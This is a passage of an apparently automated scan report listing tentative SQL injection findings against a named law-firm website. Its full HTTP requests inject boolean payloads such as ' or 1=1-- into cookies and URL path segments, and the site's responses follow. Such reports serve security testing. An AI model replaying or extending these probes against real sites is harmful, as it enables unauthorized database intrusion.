<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...
1.20. http://www.curtis.com/favicon.ico [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 20486949'%20or%201%3d1--%20 and 20486949'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.130314580320486949'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:01:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.130314580320486949'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...
1.21. http://www.curtis.com/favicon.ico [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 35245083%20or%201%3d1--%20 and 35245083%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236735245083%20or%201%3d1--%20; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:01:11 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236735245083%20or%201%3d2--%20; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...
1.22. http://www.curtis.com/favicon.ico [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 16393691'%20or%201%3d1--%20 and 16393691'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16393691'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:00:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16393691'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...
1.23. http://www.curtis.com/favicon.ico [sifrFetch cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 10585096'%20or%201%3d1--%20 and 10585096'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10585096'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:00:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10585096'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...
1.24. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 23520338'%20or%201%3d1--%20 and 23520338'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts23520338'%20or%201%3d1--%20/DateRange/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts23520338'%20or%201%3d2--%20/DateRange/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
1.25. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15465428'%20or%201%3d1--%20 and 15465428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/DateRange15465428'%20or%201%3d1--%20/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts/DateRange15465428'%20or%201%3d2--%20/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
